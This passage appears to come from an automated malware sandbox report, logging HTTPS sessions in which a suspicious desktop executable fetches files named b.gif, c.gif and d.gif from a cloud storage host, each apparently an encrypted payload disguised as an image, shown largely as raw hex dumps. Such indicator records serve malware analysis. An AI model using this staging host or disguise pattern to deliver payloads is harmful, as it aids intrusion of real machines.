                                                                                                              2025-01-11 03:42:19 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                                                                                              Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                                                                                              2025-01-11 03:42:19 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                                                                                              Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                                                                                                              2025-01-11 03:42:19 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                                                                                              Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                                                                                              2025-01-11 03:42:19 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                                                                                              Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.84971039.103.20.1054431824C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:20 UTC111OUTGET /b.gif HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:21 UTC546INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:21 GMT
                                                                                                              Content-Type: image/gif
                                                                                                              Content-Length: 125333
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E89D5A53BB3131F615ED
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                                                                              Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 10333201072197591521
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000104
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                                                                              x-oss-server-time: 3
                                                                                                              2025-01-11 03:42:21 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                                              Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                                              2025-01-11 03:42:21 UTC4096INData Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a
                                                                                                              Data Ascii: _X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                                                                                              2025-01-11 03:42:21 UTC4096INData Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd
                                                                                                              Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                                                                                              2025-01-11 03:42:21 UTC4096INData Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93
                                                                                                              Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                                                                                              2025-01-11 03:42:21 UTC4096INData Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90
                                                                                                              Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                                                                                              2025-01-11 03:42:21 UTC4096INData Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1
                                                                                                              Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                                                                                              2025-01-11 03:42:21 UTC4096INData Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9
                                                                                                              Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                                                                                              2025-01-11 03:42:21 UTC4096INData Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac
                                                                                                              Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                                                                                              2025-01-11 03:42:21 UTC4096INData Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14
                                                                                                              Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                                                                              2025-01-11 03:42:21 UTC4096INData Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52
                                                                                                              Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJR


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.84971139.103.20.1054431824C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:22 UTC111OUTGET /c.gif HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:23 UTC546INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:22 GMT
                                                                                                              Content-Type: image/gif
                                                                                                              Content-Length: 10681
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E89E820F3F35349B9878
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                                                                              Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 10287299869673359293
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000104
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                                                                              x-oss-server-time: 16
                                                                                                              2025-01-11 03:42:23 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                                              Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                                              2025-01-11 03:42:23 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                                                                                              Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                                                                                              2025-01-11 03:42:23 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                                                                                              Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.84971239.103.20.1054431824C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:24 UTC111OUTGET /d.gif HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:24 UTC547INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:24 GMT
                                                                                                              Content-Type: image/gif
                                                                                                              Content-Length: 3892010
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8A077F3A93932A8C02E
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                                                                              Last-Modified: Fri, 10 Jan 2025 12:31:05 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 3363616613234190325
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000104
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                                                                              x-oss-server-time: 28
